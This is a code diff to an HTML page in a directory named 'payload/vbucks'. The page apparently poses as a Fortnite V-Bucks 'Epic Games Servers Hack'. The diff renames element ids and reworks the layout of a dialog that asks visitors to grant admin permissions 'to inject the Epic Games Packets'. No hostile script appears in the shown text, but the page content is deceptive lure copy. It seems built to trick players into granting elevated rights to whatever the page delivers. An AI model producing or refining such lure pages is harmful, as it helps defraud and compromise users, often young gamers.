--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -111,7 +111,7 @@
                                     </div>
                                 </div>
                                 
-                                <div class="col-lg-12 verification-wrap" style="display: none;">
+                                <div class="col-lg-12 verification-wrap" style="display: none;" id="verification">
                                     <div class="verification col-sm-7 col-xs-9 center-block">
                                         <div class="header-wrap">
                                             <h4 style="font-family: fortnite; font-size: 25px; text-transform: uppercase;">Epic Games Servers Hack</h4>
@@ -129,17 +129,15 @@
                                     </div>
                                 </div>
                                 
-                                <div class="wrap-wrap-clone" style="display:none;" id="confirm">
+                                <div class="wrap-wrap-clone" style="display:none;" id="warning">
                                     <div class="col-sm-9 col-xs-9 center-block input-wrap text-center">
                                         <h4 style="font-family: fortnite; font-size: 20px; text-transform: uppercase;">Your computer might need admin permissions to inject the Epic Games Packets successfully. Do you want to continue?</h4>
                                         <div id="menu-outer">
                                             <div class="table">
-                                                <ul id="horizontal-list">
-                                                    <div style="margin: 0 auto;"> <!-- CANT GET CENTERING TO WORK UGH -->
-                                                        <li><a href="index.html#" id="confirm_yes"><span>Yes</span></a></li>
-                                                        &nbsp;&nbsp;&nbsp; <!-- I'm a lazy ree -->
-                                                        <li><a href="index.html#" id="confirm_no"><span>No</span></a></li>
-                                                    </div>
+                                                <ul id="horizontal-list"> <!-- CANT GET CENTERING TO WORK UGH -->
+                                                    <li><a href="index.html#" id="confirm_yes"><span>Yes</span></a></li>
+                                                    &nbsp;&nbsp;&nbsp; <!-- I'm a lazy ree -->
+                                                    <li><a href="index.html#" id="confirm_no"><span>No</span></a></li>
                                                 </ul>
                                             </div>
                                         </div>
